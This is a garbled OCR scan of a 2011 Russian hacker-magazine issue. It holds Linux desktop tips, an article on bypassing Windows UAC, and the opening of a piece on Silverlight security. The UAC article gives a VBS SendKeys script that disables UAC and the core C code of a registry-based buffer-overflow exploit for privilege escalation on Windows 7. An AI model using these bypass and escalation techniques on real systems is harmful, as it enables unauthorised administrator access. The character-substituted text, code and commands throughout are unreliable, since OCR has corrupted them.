Инструмент этот довольно популярен, но отсутствует в репозитори- 
ях большинства дистрибутивов. Поэтому придется устанавливать 
вручную: 

$ біісіо ар1-§е1: іпзіаіі руІІіоп-хІіЬ 
$ м§е1 б11р://§оо.§1/Ѵ6гІлІѴ 
$ Іаг -Х 2 -Р ру1у1е-0.7.5.1:аг.§2 
$ ссі руІуІе-Ѳ.7.5 
$ біісіо руібоп зеіир.ру іпзіаіі 

Запуск стандартен: 



Рекомендую сразу поместить эту команду в автозагрузку, потому как по 
умолчанию руіуіе ни как себя не выдает и не меняет поведения ѴѴМ, а 
вот пригодиться он может в любую минуту. 

Сам тайлинг активируется после нажатия комбинации <АІІ+А>, для 
деактивации предназначена комбинация <АІІ+ІІ>. Комбинация 
<АІІ+2> переключает между режимами тайлинга (то есть варианта- 
ми раскладки окон). Что-то еще говорить здесь не имеет смысла, с 
тайлингом нужно знакомиться лично, только тогда его смысл станет 
понятным. Приведу лишь остальные возможные клавиатурные комби- 
нации: 

А11+1 / А11+К - переключиться между окнами; 

А11+Н / А11+І. - изменить размер окон; 

А11+5МІ-Р1+С - закрыть окно; 

А11+М - перевести фокус на основное окно; 

А11+С - сделать следующее окно основным; 

АИ+ЗНі-РІ+Р / А11+5МІ-Р1+В - включить или выключить декорацию 
окна и бордюров. 

В своей работе руіуіе использует все тот же ЕѴѴМН, поэтому он 
совместим с любым более-менее современным ѴѴМ (список 
ЕѴѴМН-совместимых ѴѴМ можноувидеть, например, в Википедии: 

еп.ѵѵі кіресІіа.огд/ѵѵікі/ЕѴѴМ Н ). 

апускаем приложения 
ыстро и непринужденно 

Знаешь, что делает работу в Мае 05Х по-настоящемуудобной? Если 
ты думаешь, что это качество ПО, сбалансированный графический ин- 
терфейс, скорость работы или еще что-то в этом роде, то я тебя разоча- 
рую: самое удобное, что есть в макосях — это І_аипсЬег, программа для 
запуска приложений, рудиментарный аналог которой можно найти 
почти в любой графической среде, если нажать <АІІ+Е2>. 
Преимущество яблочного лончера втом, что помимотупого запуска 
программ он выполняетогромное количество других функций: поиск 
файлов, сайтов, истории браузера, управление другими программа- 
ми, сложение, умножение, деление и многое другое. Вся суть втом, что 
все это доступно через единое окно ввода. 

Аналог (и очень хороший аналог) Мае 08 X І_аипсЬегесть в К0Е4. Он 
доступен через стандартную комбинацию <АІІ+Е2>, хорошо выглядит, 
быстро работает и имеет кучу плагинов. 

Ксожалению, в другихсредах все далеко нетакрадужно. Например, 
в Опоте и ХЕСЕ чего-то подобного нет до сих пор, а стандартная за- 
пускалка, доступная по <АІІ+Е2>, наводит грусть и печаль. Приходится 
искать сторонние программы. И они есть, это Споте йо ( сІо.сІаѵеЬзсІ. 
сот ) и І_аипсЬу ( аипсбу.пеі ). Обе хорошо развиты и имеют потенциал. 
Единственное, что портитобщее впечатление, это требование топо 



$ руіуіе 
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Одно и то же сообщение поі№у-$епсІ в двух разных ѴѴ/ЛЛ 

для Ѳпоте йо и ОТ для І_аипсЬу (который, ктомуже, в Ыпих работает 
нестабильно). 

Создаем графические 
уведомлениям диалоги 
из консоли 

Привыкнув решать рутинные задачи с помощью скриптов, рано или 
поздно сталкиваешься с проблемой их интеграции в графическое 
окружение. Те, кто пишет на руібоп, гибуи других языках, легко реша- 
ютэту задачу с помощью графических библиотек, но что делать, если 
твой выбор — ЬазЬ? 

Понятно, что полноценно вписать Ьазб в графическую среду не по- 
лучится просто по причине его технических ограничений. Зато всегда 
можно воспользоваться специальными утилитами командной строки, 
которые генерируют простые графические интерфейсы на основе 
опций командной строки. 

Одна изтакихутилит называется гепііу ( Ііѵе.дпоппе.огд/ЕепіЫ . Это по- 
томок довольно популярной утилиты дбіаіод, которая, в свою очередь, 
представляет собой графическую версию біаіод (на которой по- 
строены многие псевдографическиеутилиты и, например, интерфейс 
инсталлятора Зіаскѵѵаге Ыпих). 

Утилиту чрезвычайно просто использовать, достаточно вызватьее 
с нужными параметрами, и на экране появится графическое окно. 
Например, следующая команда отобразит на экране окно стекстом 
«Неііо ѴѴогІсІ!»: 

$ іепіііу --іітРо --■Ьех'Ь "Неііо Іліог 1сІ\ ! " 

Также можно изобразить поля ввода ('— епігу'), сообщения об ошибке 
('--еггог'), списки ('— Іізі'], прогресс-бары ('— ргодгезз'), календарь 
С--са Іепсіа г') и многое другое. При этом информация о действиях 
пользователя (какая клавиша нажата, какой элементсписка выбран и 
такдалее) с окном возвращается в стандартный вывод, что позволяет 
строить довольно сложные интерфейсы. 

Если функциональность 2епіІу кажется тебе излишней для простого 
скрипта, который должен всего лишь вернуть на экран свои данные, 
самое время взглянуть на команду поіііу-зепсі . 

Единственная задача этой команды — вывести на экран информаци- 
онное сообщение и убрать его спустя определенный промежуток вре- 
мени. Для вывода используется интерфейс Іі Ьпоіібу, так что сообще- 
ние будет выглядеть родным в любом менеджере окон и графической 
среде с поддержкой этой библиотеки (а это все наиболее популярные 
ѴѴМиОЕ). 

Пользоваться командой очень просто: 

$ біісіо ар1:-§е1: Іпз1:а11 1іЬпо1:і-Ру-Ьіп 
$ поііі-ру-зепсі "Арасбе перезапущен!" 

Для разнообразия можно добавить иконку и указать важность со- 
общения: 

$ поіі-ру-зепсі -і §1:к-сІіа1о§-іп-Ро -и сгіігісаі \ 

"Файловая система заполнена на 99%!" 

Переключаем раскладку 
клавиатуры автоматически 

Одно из самых известных приложений для ѴѴіпсІоѵѵз называется 
Рипіо Эѵѵіісбег. Его задача заключается в том, чтобы автоматически 




Уведомление 

В УЬипЕи оно пмгллдиттзк 



переключать раскладки клавиатуры, основываясь на эвристических 
методах анализа введенной пользователем строки. В Еіпих (да и в лю- 
бом *піх) аналогэтой программы называется хпеиг (ХІЧеигаІЭѵѵіІсЬег) 
и, в отличие отсвоего брата из ѴѴіпсІоѵѵз, распространяется бесплатно, 
да еще и с исходниками. 

Демон хпеиг может существенно сэкономить твое время и нервы, но 
чтобы он не стал помехой, нужно уметь его готовить, а точнее — пра- 
вильно настраивать. 

Основная проблема, с которой сталкиваются почти все новые пользо- 
ватели хпеиг, это вездесущность программы. Поумолчанию действие 
хпеиг распространяется на всю систему, хотя в Ыпих, со всеми его 
эмуляторамитерминалов, запускалками приложений и прочими 
двухрежимными ѵіт’ами было бы гораздо правильнее применять 
возможности хпеигтолько к избранным приложениям (тем более, что 
с некоторыми из нихон работает некорректно). 

Чтобы научить этому хпеиг, достаточно создать локальную копию его 
конфигурационного файла: 

$ ср /изг/е1:с/хпеиг/хпеиггс ~/ .хпеиг/хпеиггс 

И отредактировать его следующим образом: 

$ ѵі -/.хпеиг/хпеиггс 

# Включаем обычный режим работы 
МапиаІМосІе Ѵез 

# Приложения, в которых хпеиг должен работать 
в автоматическом режиме 

БеІАиІоАрр РісІ§іп 
БеІАиІоАрр Рзі 
БеІАиІоАрр СесШ: 

БеІіАиІоАрр Сбготіит 

# Приложения, несовместимые с хпеиг 
ЕхсІисІеАрр Росизыгіііег 
ЕхсІисІеАрр Ілііпе 

Возможно, отавтоматического режима следует вообще отказаться, 
воспользовавшись поддержкой горячих клавиш. Дело втом, что 
в процессе своей работы хпеиг не просто меняет раскладку, но и 
исправляет часть уже набранного текста, а это дает возможность ис- 
правлять введенные слова не «на лету», а только по запросу пользо- 
вателя уже послетого, какслово было набрано. Во многих случаях это 
оказывается болееудобным и предпочтительным вариантом. Всего 
хпеиг поддерживает около десяти различных клавиатурных комбина- 
ций, самые полезные из которых перечислены ниже: 

Клавиатурные сочетания хпеиг 

Вгеак - исправить последнее введенное слово; 

БНі-Рѣ+Вгеак - исправить выбранный текст; 

С*г1+Ргіп1: - изменить режим работы программы; 

А1*+5сго11 І_оск - применить к выбранному фрагменту 
транслитерацию ("привет" -> "ргіѵеі:"); 

СѣгІ+ТаЬ - развернуть аббревиатуру; 

Ілііп+Р - вставить текущую дату 

Более того, даже если ты не собираешься использовать хпеиг для 
переключения раскладок, его все равно стоит уста но вить из-за раз- 
личных плюшек, которые он дает при наборе текста. Это, например, 
исправление слов, набранных со СЛУЧАЙНО нажатым СарзІ_оск, 
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Я Запускаем нужные приложении 

сЬгошіит & 

аийэсіоиз & 

хіегт -с тсаЬЬег А 

Я Ждем пять секунд, чтобы Все это 
1 успело пнВиться на экране 
зіеер 5 

Я ОтпаВляем сЬгптіит на Второй рабочий 
Я стол и растяги&аем на Весь экран 
илсігі -г ейгптіит -і 2 
ыюсігі -г сіігрлііит -Ь айсМиІ Ізсгееп 

Я СВорачиВаен аигіасіоия чтобы не мешал 
ыілсігі -г аийасіиэ -Ь айсі.вбайесі 

Я ОтпраВлнем. кіегш с открытым ілсаЬЪег на 
Я Второй рабочий стол, задаем ему нужный 
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ІІ ОиТІпе ипиэей Зйпдиадс-з 
В Ёхлцііі; 

|*Ехі:]и(Зс1йГРДО0Ё № 

I ВеПпе ІПШйІ Ъефддгй ТЪг #11 г»еы арріісаііопа 

ТаиІІЛИзСгсж^а я 



/ . игѵзиг /кпеігг с. \. соп \ I 



Редактируем конфигурационный файл хпеиг 



Я размер и располагаем В пеВоО Верхней 
Я части экрана ( 50 , 58 ) 
шпсігі -г тсаЬЬег -і 2 



УЫп/штп ЕЗІагіир.^НП] [^ІіІ 



— встпвко — 

Пишем скрипт, управляющий менеджером окон 



исправление двойных ПРописных букв, удаление или добавление 
лишних/нужных пробелов перед и после знаков препинания, автома- 
тическое исправление строчной буквы на прописную послеточки. 



Настраиваем универсальные 
горячие клавиши 



Почти любой менеджер окон позволяет повесить на горячие клавиши 
выполнение внешних команд, что делает очень удобным запуск часто 
используемых приложений или консольных команд. Одна беда: хоткеи 



которая позволяет настроить как мультимедийные клавиши клавиатуры 
(для этого имеются преднастроенные конфиги для разных моделей], 
таки клавиатурные комбинации. Пользоваться ей просто: запускаем 
программу, выбираем модельсвоей клавиатуры, при необходимости 
переназначаем клавиши, используя графический интерфейс. 
Программа снабжена демоном кеуІоисМ, который «слушает» 
нажатия клавиш, поэтому его придется добавить в автозагрузку 
(в ОеЬіап/ІІЬипІи это происходитавтоматически при установке 
пакета). 

Выжимаем из мыши все 

Несмотря на очевидное удобство, клавиатурные комбинации и 
мультимедийные клавиши подходят далеко не всем. Если ты привык 
использовать мышьдля выполнения любых действий в иксах, то 
«мышиные жесты» — это то, что тебе нужно. 

Поддержка жестов по умолчанию есть в КйЕ.такчто если ты пользо- 



приходится настраивать отдельно для каждого менеджера окон, что 
не оченьудобно, если ты еще не определил свой идеал или просто 
пользуешься разными ѴѴМ. 

Ксчастью, решить проблему можно с помощью все того же хпеиг. До- 
статочно добавить в хпеиггс записи примерно следующего вида: 



вательэтой среды, то можешь сразу идти в меню конфигурирования 
устройств ввода и выполнить настройку. В противном случаеутебя 
остается только один выбор: установить программу еазѵзігоке (збпеі/ 
аррзЛгас/еазѵзІгоке ): 



$ ѵі -/.хпеиг/хпеиггс 

АсісіАсіііоп Аіі 1: Вызов терминала <стсІ>§поте-1:ептіпа1</стсІ> 
АсісіАсіііоп А 11: § Открыть Сесіііі <стсІ>§есІі1і</стсІ> 

АсісіАсіііоп 5ирег_І_ Открыть ІМаиІііІиз <стсІ>паи1:і1и5 ~/</стсІ> 

Обрати внимание, что поумолчанию в конфигурационном файлеуже 
есть несколько очень даже полезных клавиатурных комбинаций — на- 
пример, для поиска выделенной строки в Ѳоодіе (ѴѴіп+6) или перево- 
да выбранного слова (ѴѴіп+Р). 

Активируем мультимедийные 
клавиши 

Один из самых эффективных способов повысить продуктивность 
своей работы заключается в использовании различных клавиатурных 
комбинаций и мультимедийных клавиш, присутствующих на многих 
клавиатурах. Однако далеко не всегда эти дополнительные клавиши 
начинают работать прямо из коробки. Ктомуже часто на них хочется 
повесить совершенно другие действия. 

КОЕ и Опоте в большинстве случаев распознаюттакие клавиши и 
даже позволяют менять эффект от их нажатия с помощью графическо- 
го конфигуратора, но они привязаны ксамим графическим средам, и в 
каком-нибудь ЕІихЬох их будеттрудно задействовать. 

В этом случае спасет графическая программа кеуІоисЬ ( кеѵіоисб.бкпеі ). 



$ зисіо ар1і-§е1і іпзііаіі еазузіігоке 

После запуска втрее появится значок программы в виде разноцвет- 
ной загогулины, символизирующей ход мыши при расчерчивании 
жеста. После щелчка по значку на экране появится окно программы 
с пустым списком жестов. Щелчок по кнопке «Абб Асііоп» добавляет 
новый жест, для которого нужно выбрать имя и тип действия (наш вы- 
бор — Соттапб, предназначенный для запуска новых приложений). 
Далее следует ввести имя запускаемой команды и щелкнуть по ячейке 
колонки Зігоке, после чего можно нарисовать нужный жест. Делать 
это следуете нажатой третьей клавишей мыши (колесико) и макси- 
мально быстро (не стоит пытаться вырисовать красивый жест, потому 
что его будеттрудно повторить). 

Проделываем эти действия для каждой команды и жеста, сворачива- 
ем программу втрей, наслаждаемся (стоит отметить превосходный 
уровень распознавания, 10 из 10). При необходимости добавляем 
еазузігоке в автозапуск. 

Выводы 

У каждого их нас свои представления о красоте и удобстве 
графического интерфейса, поэтому универсальных рецептов его 
настройки не существует. Но выбрав из описанных в статье под- 
ходов те, которые близки именно тебе, ты сможешь сделать ОС 
проще и удобнее, ц-ц 



► 096 



ХАКЕР 06 /149/ 201 1 







Почти 3 000 000* настоящих мужчин 

смотрят МАМ ТУ 



Россия, население 4+ (ТМ5 Россия), декабрь 2(М 0 - февраль 201 1 , накопленный охват (Веб) 

' ч , Реклама 










ѴаѴаѴаѴ 



у 



ѵ 

/ѵѵѵѵ\ 

хАААА 




% Ш 



ОБЛАМЫВАЕМ ЦАС 



Так ли страшна программисту система 
контроля пользователей? 

о Уж не знаю, сколько раз в тырнетах поднималась пресловутая тема 
контроля за действиями пользователя (ІІАС): нужна ли она, 
насколько эффективна... Но мы рассмотрим этот вопрос еще раз, 
теперь с чисто прикладной, хакерской точки зрения. Плюсы и минусы 
системы, а также самое главное - как ее можно обойти. 



Итак, что же такое ІІАС сточки зрения безопасности? Разработчики 
ѴѴіпсІоѵѵз (видимо, немало озаботившисьунылыми сведениями из баг- 
траков, регулярно пополняющимися все новыми и новымиуязвимостя- 
ми всамой распространенной ОС в мире) решили, что если уж все или 
почти все юзеры сидят под правами администратора, то надо сделать 
некий программный компонент, который будет испрашиватьу юзеров 
разрешения. Оставим в стороне холивар натему«Нужны ли простому 
юзеру права администратора?», поскольку сей крайне философский 
вопросспорен: содной стороны, права админа простому пользователю, 
действительно, не нужны, а с другой — они нужны туевой хуче довольно 
повседневных программ. Итак, ІІАС призвана обеспечить пользовате- 
лям возможность работать, не прибегая кадминистративным правам. 



Обладая административными правами, пользователь может просма- 
тривать и изменятьлюбуючастьоперационной системы, включая код 
и данные других пользователей и даже самой ѴѴіпсіоѵѵб. Без админи- 
стративных прав пользователи не могут случайно изменить системные 
параметры, вредоносная программа не может изменить параметры 
системной безопасности или отключить авер, а пользователи не могут 
нарушить безопасность важных данных других пользователей на обще- 
доступных компьютерах. Работа с правами обычного пользователя, та- 
ким образом, помогаетуменьшить количество срочных вызовов службы 
поддержки в корпоративных средах, смягчить ущерб от вредоносной 
программы, способствует более четкой работе домашних компьютеров и 
защищаетуязвимые данные на общедоступных тачках. 
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Отключение ІІАС через оснастку 



ІІАС делитвсе исполняемыезадачи на две группы —те, 
которые могутбыть исполнены обычными пользователями, 
и те , кото рыевыполня ются тол ькоадмини страто ра м и . II АС 
незаметнодля администратора переводитсистему в режим 
непривилегированного пользователя, а когда требуются 
права администратора — появляется системный диалог, 
через который можно временно повыситьсвои права. 

И ведь надо признать, что введение ІІАС довольно сильно 
обломало начинающих и не очень кодеров, зарабаты- 
вающихсебе на жизнь разработкой малваридакчто на 
специальных бордах заказчики теперь в первую очередь 
спрашивают о возможности кода работать в ѴІ5Іа/7 и 
обходить ІІАС. Платили и до сих пор платятза это вполне 
адекватные деньги. 



Определить потребность системы и приложений в адми- 
нистративных правах можно множеством способов. Один 
из них — команда контекстного меню и ярлык«Запускот 
имени администратора» в пользовательском интерфей- 
се проводника. Эти элементы содержат цветной значок 
щита, который должен быть добавлен ко всем кнопкам или 
пунктам меню, выбор которых приводиткповышению прав. 
При выборе элемента «Запускотимени администратора» 
проводник вызывает АРІ-функцию5ЬеІІЕхесиІе с командой 
«гипаз». 

Подавляющее большинство программ установки требу- 
ютадминистративныхправ, поэтомузагрузчикобразов, 
который инициируетзапускисполняемого файла, содержит 
код обнаружения установщиков для выявления устаревших 
версий. Часть алгоритмов используемой загрузчиком эври- 
стики довольно проста: он ищет слова «зеіир», «іпзІаІЬили 
«ирбаіе» в имени файла образа или внутренней инфор- 
мации о версии. Более сложные алгоритмы включают 
просмотр в исполняемом файле последовательностей 
байтов, обычно применяемых сторонними разработчиками 
в служебных программах — установочных оболочках. 

Чтобы определить, нуждается ли целевой исполняе- 
мый файл в правахадминистратора, загрузчикобразов 
также вызываетбиблиотеку совместимости приложений 
(аррсотраі). Библиотека обращается к базе данных 
совместимости приложений, чтобы определить, свя- 
заны ли с исполняемым файлом флаги совместимости 
РециігеАсІтіпізІгаІогили РипАзІпѵокег. 

Самый общий способ запросить для исполняемого файла 
административные права — добавить в его файл манифе- 



Немного ликбеза, или как 
законно получить права ад 
мина 
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Іопцяие 



Типичная реакция ІІАС на непонятные действия 



ста приложения тег гециезІебЕІеѵабопБеѵеІ. Манифесты 
— этоХМБ-файлы, содержащие дополнительные сведе- 
ния об образе. Они были введены в ѴѴіпбоѵѵзХР какспособ 
определения зависимостей для параллельно используе- 
мых библиотек БББ и сборок МісгозоО: .ЫЕТ Егаппеѵѵогк. 
Наличие в манифесте элемента Іхизііпію (он показан ниже 
во фрагменте дампа ЕігеѵѵаЕзеШпдз.ехе) означает, что ис- 
полняемый файл был написан для ѴѴіпбоѵѵз Ѵізіа и содер- 
жит элемент гедиезІебЕІеѵабопБеѵеІ. Атрибут Іеѵеі этого 
элемента может иметь одно изтрехзначений: азіпѵокег, 
ЫдбезіАѵаіІаЫе и гедиігеАбпліпізІгаІог. 

кТгизТІп-Ро 

хт1п5="игп:5СІіета-тісго50-Р1:-сот:а5т.ѵЗ ,, > 

<5есигі1:у> 

<гедиез1:есІРгіѵі1е§е5> 

<гедиез1:есІЕхеси1:іоп Іеѵеі 
ІеѵеІ^'гедиігеАгітіпІБІігаІіог" 
иіАссе55="-РаІ5е"/> 

</гедие5І:есІРпіѵі1е§е5> 

</зесигі1:у> 

</1:ги5І:Іп-Ро> 

Исполняемые файлы, нетребующие административных 
прав, (например Ыоіераб.ехе], имеютзначение атрибута 
азіпѵокег. В некоторых исполняемых файлахзаложено 
допущение, что администраторы всегда хотят получить 
максимальные права. Поэтому в них используется значение 
ЬідбезіАѵаіІаЫе. Пользователю, запускающему исполняе- 
мый файл с этим значением, предлагается повысить права, 
только если он работаете режиме ААМ или рассматрива- 
ется как администратор согласно определенным ранее 
правилам, и в связи с этим должен повысить права для 
обращения ксвоим административным привилегиям. 
Примерами приложений, для которых используется 
значение ЫдбезіАѵаіІаЫе, могут служить программы 
ПедесІіЕехе, Мтс.ехе и Еѵепіѵѵѵг.ехе. Наконец, значение 
гедиігеАбтіпізІгаІог всегда инициируетзапрос повышения 
и используется всеми исполняемыми файлами, которым не 
удастся выполнить свои действия без административных 
прав. 

В приложениях со специальными возможностями атрибуту 
и іАссезз задается значение «Ігие» для управления окном 
ввода в процессахс повышенными правами. Крометого, 
для обеспечения этих возможностей они должны быть 
подписаны и находиться в одном из нескольких безопасных 
размещений, включая %Зу5ІетРооІ% и %РгодгатЕіІез%. 
Значения, задаваемые исполняемым файлом, можно лег- 
ко определить, просмотрев его манифесте помощью слу- 
жебной программы ЭідсбескотЭузіпІегпаІз. Например: 
зідсЬеск-пп <ехесійаЫе>. При запуске образа, который 
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На БѴБ ты можешь 
найти код, реали- 
зующий тот самый 
эксплойт, который 
способен обломать 
БАС в ѴѴіпбоѵѵз 7. Он 
слегка подпорчен, но 
если ты не ламер (а 
ты ведь не такой?!], 
то тебе не составит 
труда найти в нем 
ошибки. 
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Хочешь зарабатывать 
на поиске уязви- 
мостей в различ- 
ных программных 
продуктах? Со іюг 
гегосіаѵіпібабѵе.сопп 
и получи от $1000 до 
$10 000 за найденную 
уязвимость! 




Все более и бо- 
лее убеждаюсь: не 
умеешь пользоваться 
отладчиком — делать 
в сетевом хакинге 
тебе нечего! 
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Меняем настройки ІІАС 

запрашиваетадминистративные права, службе сведений о приложе- 
нии (известна также какАІЭ, находится в %5узІетРооІ%\5уз1:епп32\ 
АрріпЬ.сіЩ, работающей в процессе Эегѵісе Нозі (%5у5ІетРоо1;%\ 
5у5Іет32\5ѵсЬоБІ.ехе) р предписывается запустить программу СопзепЕ 
ехе (%5у5ІетРооІ%\5у5Іепп32\Соп5еп1.ехе). Программа Сопзепі соз- 
даетснимокэкрана, применяет кнему эффектзатемнения, переклю- 
чается на рабочий стол, доступный только системной учетной записи, 
устанавливаетзатемненный снимокв качестве фона и открывает диа- 
логовое окно повышения прав, содержащее сведения об исполняемом 
файле. Вывод на отдельном рабочем столе предотвращает изменение 
этого диалогового окна любой вредоносной программой, работающей 
под учетной записью пользователя. 

Лезем в обход ІІАС 

Итак, теперь отом, для чего мы все здесь, собственно, собрались. Мож- 
ноли обойти ІІАС? Да, можно. Первое решение, таксказать, лобовое. И 
основано оно на том удивительном факте (или просчете разработчиков 
ѴѴіпсІоѵѵз?), что при изменении политики ІІАС системе глубоко фиоле- 
тово, каки кто именно это делает, человек при помощи указателя мыши 
или же все делается программным способом. То есть фактически систе- 
ма не различает, кто именно передвигаетзаветную стрелочку. 

Этим мы и воспользуемся — что нам стоит программно отключить 
ІІАС? Ничего! Но пойдем мы нетрадиционным способом — забудем о 
существующих в языках высокого уровня вроде С++ или С# методахтипа 
ЭепсЖеуз, а возьмем на вооружение простой ѴВ5-скрипт. 

Бе* ІлІБІіБІіеІІ = ІлІБсгірІ. Сгеа^еОЬдес^ЫБсг^.БбеП") 

ІлІзТіБИеІІ . БепсІКеуз ( " Л {Е5С}" ) 

ІлІБсгірІ .51еер( 500) 

ІлІБІіБІіеІІ. БепсІКеуБ ("сІіап§е иас") 

ІлІ5сгірі.51еер(2000) 

М5б5бе11.5еп<ЖеуБ("{00ІлІІ\І}") 

М5б5бе11.5еп<ЖеуБ("{00ІлІІ\І}") 

ІлІБбЗбеІІ . БепсІКеуБ ( "{ЕІМТЕК}" ) 

ІлІБсгірІ:. 51еер(2000) 

ІлІБІіБІіеІІ . БепсІКеуБ ( "{ТАВ}" ) 

ІлІБІіБІіеІІ . БепсІКеуБ ( "{ООІлІІМ}" ) 

ІлІБІіБІіеІІ . БепсІКеуБ ( "{ООШ}" ) 

ІлІБІіБІіеІІ. БепсІКеуБ ("{ООІлІІ\І}") 

ІлІБІіБІіеІІ . БепсІКеуБ ( "{ТАВ}" ) 

ІлІБІіБІіеІІ . БепсІКеуБ ( "{ЕМТЕК}" ) 

V/ Тут есть одна заковыка - чтобы выбранные изменения 



V/ вступили в силу., систему нужно перезагрузить 
'// ІлІБІіБІіеІІ. Кип "БІіиісІоіл/п /г /Т" 

Да-да, всего-то и нужно, что воспользоваться благами ѴѴіпсІоѵѵз Эсгірі 
Нозі (ѴѴ8Н), где, кстати, сокрыто от глаз огромное разнообразие воз- 
можностей для управления системой, о которых частенько забывают. 
Но об этом речь пойдет в другой раз. 

Второе решение обхода ІІАС — тоже программное, но не лобовое, а 
основанное на уязвимости самой системы. 

Переполнение буфера 

Казалось бы, какая связь между переполнением буфера и ІІАС? 
Оказывается, таящиеся в ѴѴіпсІоѵѵз баги позволяютобойти ограни- 
чения ІІАС и повыситьсвои права. Сегодня я покажу на конкретном 
примере, какпри помощи тривиального переполнения буфера можно 
обойти ІІАС и добиться администраторских прав. 

Есть такая ѴѴіпАРІ — ВНОиегуРедізІгуѴаІиез ( тзсіп.пп іеговой. сот ), 
она используется длятого, чтобы запрашивать множественные зна- 
чения из реестра одним своим вызовом, что делается с использова- 
нием специальной таблицы РТІ__С!ІІЕРѴ_РЕѲІ5ТРѴ_ТАВІ_Е, которая 
передается в качестве іп оиі параметра. 

Самое интересное (и постыдное для разработчиков Місгозоіі) в этой 
АРІ то, что существует определенный ключ реестра, который можно 
изменить при помощи ограниченных пользовательских прав: НКСІІ\ 
ЕСЮС\[Еапдиаде]\5уз1;ет0е1 : аи11;ЕІЮСРопІ. Если сменить тип этого 
ключа на РЕ6_Е>ІІ\ІАРѴ, то вызов РиОиегуРедізІгуѴаІиез приведет к 
переполнению буфера. 

Когда ядерная АРІ -функция ѴѴіп32к. зуз! N166 ІЕпаЫеЕибс запраши- 
вает ключ реестра Н КСЦІХЕЦІ 0С\[Еапдиаде]\8уз1:ет 0е{аи11:ЕІІ ОСРопі, 
она честно предполагает, что этот ключ реестра имееттип РЕ6_32, 
так что в буфер передается структура II N ІС00Е_5ТРІ N0, у кото- 
рой первое поле является типом ІІІ_0МѲ (где представлена длина 
строки). Нотак какмы можем изменить тип этого параметра на 
РЕ6_Е>ІЫАРѴ, то систему это ставитв глубокий тупик и она непра- 
вильно интерпретирует длину передаваемого буфера, что приводит к 
переполнению стека. 

Ключевой момент эксплойта 

ІІІІМТ собера§е = СеіАСР(); 

ТСНАК ітрБіг[256] ; 

_5іргіпі-р_5(ітр5іг, ТЕХТ("Е1ЮС\\%сГ) , со6ера§е); 

НКЕУ ІіКеу; 

Ке§Сгеа^КеуЕх(НКЕУ_С11ККЕ1\1Т_115ЕК, ітрБіг, 0 , ШІ_Щ 

КЕе_ОРТІОМ_МОЫ^/ОІ-АТІІ_Е, К ЕУ_5 Е Т_ѴА І_ II Е | 0Е1_ЕТЕ, ШІ_Щ 
&бКеу, І\ІІЛ_І_); 

Ке§0е1еіеѴа1ие(ІіКеу., ТЕХТ ( "БуБіешОе-РаиІіЕІЮСРопі" ) ) ; 
Ке§5еіѴа1иеЕх(ІіКеу, ТЕХТ("5у5іет0е-Раи1іЕШСРопі") , 0, 
КЕС_ВІІ\ІАКУ, Ке§Виі, ЕхрБііе); 

ігу 

{ 

ЕпаЫеЕІЮС(ТКІІЕ) ; 

} 

ехсері(І) 

{ 

} 

Ке§0е1еіеѴа1ие(ІіКеу., ТЕХТ ( "БуБіешОе-РаиІіЕІЮСРопі" ) ) ; 
Ке§СІ05еКеу(ІіКеу) ; 

Заключение 

Обойти ІІАС можно. Не скажу, что это легко, ведь разработчики ѴѴіпсІоѵѵз 
ѴІ5Іа/ѴѴ7 постарались на славу, надо отдать им должное. Но все же 
лазейки остаются. Можно найти одну-две кроличьихдыры, которые 
способны свести на нет старания команды ѴѴіпсІоѵѵз. Успех в этом случае 
приходит ктем, кто может работать с отладчиками и дебаггерами типа 
ЮА Рго или ѴѴіпОВО. 

Удачи тебе втвоих стараниях и да пребудет с тобой сила! □с 
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ФОКУС-ГРУППА 



Хочешь не только читать журнал, но и вместе с нами делать его лучше? Ука- 
зать на наши фейл ы или выразить респект за сделанную работу? Зто легко. 
Вступай в ряды нашей фокус-группы и выигрывай класные подарки отжур- 
нала и наших партнеров. 



3 самых активныхучастника фокус-группы получат в этом месяце подписки 
на журнал Хакер: за первое место - на 12 месяцев, за второе - на 6 месяцев 
и за третье- на 3 месяца. 



РЕКЛАМА 






СООІЫО 



■ ■ Всеволод Захаров (зеѵагаѵіпдгасі.ги) 

зиѵЕкиент - 

ЗАЩИТА 
И НАПАДЕНИЕ 

Проблемы безопасности Зііѵегіідііі-контролов 

©Зііѵегіідііі, потеснив На$Н, занял свою нишу среди платформ для 
разработки ѵѵеЬ-приложений с насыщенным пользовательским ин- 
терфейсом. Конечно, возможность создания интерфейса, не усту- 
пающего по юзабилити и внешнему виду десктопным приложениям, 
- это круто, но при создании ѵѵеЬ-приложения нельзя забывать о 
безопасности. Попробуем разобраться, насколько безопасно разме- 
щение ЗіІѵегІідНІ-контента на ѵѵеЬ-страницах. 



Довольно долго динамика НТМІ_-страниц обеспечивалась за счет 
использования ЭаѵаЗсгірІ:. Он идеально подходит для проверки 
корректности заполнения форм и простых манипуляций сэлемента- 
ми БОМ, но ^ не имеет достаточных возможностей для реализации 
по-настоящемуудобного, привлекательного и быстрого пользова- 
тельского интерфейса. Поэтому и появились плагины для построения 
такназываемых ПісЬ Іпіегпеі Арріісабоп (РІА). ЭіІѵегІідЫ — один из 
таких браузерных плагинов. После очевидного провала платформы 
АсбѵеХ компания МісгозоГі: приложила немало усилий для разработки 
альтернативного решения. Большое внимание былоуделено пробле- 
мебезопасности.таккакименно проблемы с безопасностью, наряду 
с отсутствием кроссплатформенности, привели к неудаче ее первой 
ПІА-платформы. 

Зііѵегіід Ы; основана на платформе .ЫЕТ, а значит, ЭіІѵегІідЫ:- 
приложения — это управляемый код, что, согласись, уже представляет 
собой некоторое достижение в плане безопасности по сравнению с 
АсбѵеХ, в котором, используя нативные вызовы, можно былотворить 
все что угодно. 

Модель безопасности ЗіІѵегіідЬі 

ЗіІѵегіідЬі следует стандартным принципам, которые применяются при 
расширении функциональности ѵѵеЬ- контента с помощью плагинов 
браузера. 

Предполагается, что все не-ішзіесі (то есть неустановленные пользо- 
вателем как надежные) ЭіІѵегІідЫ-приложения потенциально опасны, 
и плагин ограничивает доступ этих приложений к ресурсам машины. 
Приложение ЗіІѵегІідЫ можетзапускаться в трех возможных режимах, 



для которых используются различные политики безопасности: 

• іп Ьгоѵѵзег тосіе — управляемый Зііѵегіід Ы;-код выполняется как 
частьѵѵеЬ-страницы и находится в «песочнице» (запсІЬох), равно каки 
остальной контент, например, код на ЭаѵаЗсгірЕ 

Этот режим является дефолтным, и когда ЭБ-контрол добавлен на 
страницу с помощьютега обіесі:, используется именно он. 

• оиісгі Ьгоѵѵзег тосіе — приложение может выполняться в браузере, а 
может быть установлено локально на машину пользователя. 

Этот вид приложений также выполняется в песочнице, и для него 
существуют практически те же ограничения, что и для іпЬгоѵѵзег- 
